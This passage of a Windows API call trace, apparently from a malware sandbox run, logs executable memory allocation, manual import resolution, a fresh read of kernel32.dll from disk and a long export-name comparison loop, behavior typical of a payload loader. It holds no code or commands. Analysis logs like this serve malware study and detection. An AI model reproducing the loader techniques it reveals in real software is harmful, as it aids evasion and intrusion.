hHeap=0x480000, dwFlags=0x0, lpMem=0x3010ac0 | out: hHeap=0x480000) returned 1 [0103.747] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x3023cd0 | out: hHeap=0x480000) returned 1 [0103.747] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x3036ee0 | out: hHeap=0x480000) returned 1 [0103.747] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x304a0f0 | out: hHeap=0x480000) returned 1 [0103.750] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x305d300 | out: hHeap=0x480000) returned 1 [0103.752] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x3070510 | out: hHeap=0x480000) returned 1 [0103.754] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x3083720 | out: hHeap=0x480000) returned 1 [0105.034] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0105.038] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0105.038] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0105.039] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0105.039] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0105.039] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0105.039] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0105.039] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0105.039] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0105.039] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0105.039] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0105.040] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0105.040] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0105.040] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0105.040] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0105.040] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0105.040] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0105.040] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0105.040] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0105.040] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0105.041] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0105.041] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0105.041] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0105.041] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0105.041] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0105.041] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0105.041] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0105.041] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4adb20 | out: hHeap=0x480000) returned 1 [0105.042] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0105.295] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x490340 | out: hHeap=0x480000) returned 1 [0105.298] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0105.298] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0105.298] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0105.298] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0105.298] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0105.299] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0105.301] GetProcessHeap () returned 0x480000 [0105.301] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x68) returned 0x488ce0 [0105.303] GetProcessHeap () returned 0x480000 [0105.303] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499120 [0105.304] GetProcessHeap () returned 0x480000 [0105.304] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x48) returned 0x490980 [0105.304] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0105.304] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0105.305] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0105.305] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0105.305] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0105.305] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0105.305] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0105.305] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0105.305] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0105.305] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0105.305] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0105.306] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0105.314] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0105.314] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0105.314] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0105.314] GetProcessHeap () returned 0x480000 [0105.314] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xac430) returned 0x4ac5d0 [0105.316] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0105.316] ReadFile (in: hFile=0x134, lpBuffer=0x4ac5d0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4ac5d0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0105.328] CloseHandle (hObject=0x134) returned 1 [0105.526] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0105.532] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0105.532] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0105.532] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0105.532] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0105.532] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0105.532] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0105.532] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0105.532] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0105.532] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0105.532] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0105.532] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0105.532] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0105.533] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0105.533] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0105.533] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0105.533] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0105.533] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0105.533] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0105.533] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0105.533] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0105.533] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0105.533] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0105.533] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0105.533] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0105.533] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0105.533] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0105.533] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0105.533] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0105.533] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0105.533] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0105.533] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0105.533] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0105.533] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0105.533] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0105.533] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0105.533] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0105.534] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0105.534] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0105.534] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0105.534] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0105.534] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0105.534] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0105.534] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0105.534] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0105.534] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0105.534] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0105.534] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0105.534] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0105.534] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0105.534] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0105.534] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0105.534] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0105.534] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0105.534] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0105.535] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0105.535] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0105.535] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0105.535] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0105.535] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0105.535] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0105.535] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0105.535] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0105.535] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0105.535] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0105.535] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0105.535] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0105.535] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0105.535] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0105.536] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0105.536] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0105.536] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0105.536] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0105.536] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0105.536] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0105.536] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0105.536] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0105.536] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0105.536] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0105.536] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0105.537] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0105.537] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0105.537] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0105.537] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0105.537] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0105.537] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0105.537] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0105.537] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0105.537] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0105.538] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0105.538] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0105.538] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0105.538] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0105.538] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0105.538] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0105.538] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0105.538] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0105.538] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0105.538] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0105.538] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0105.539] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", 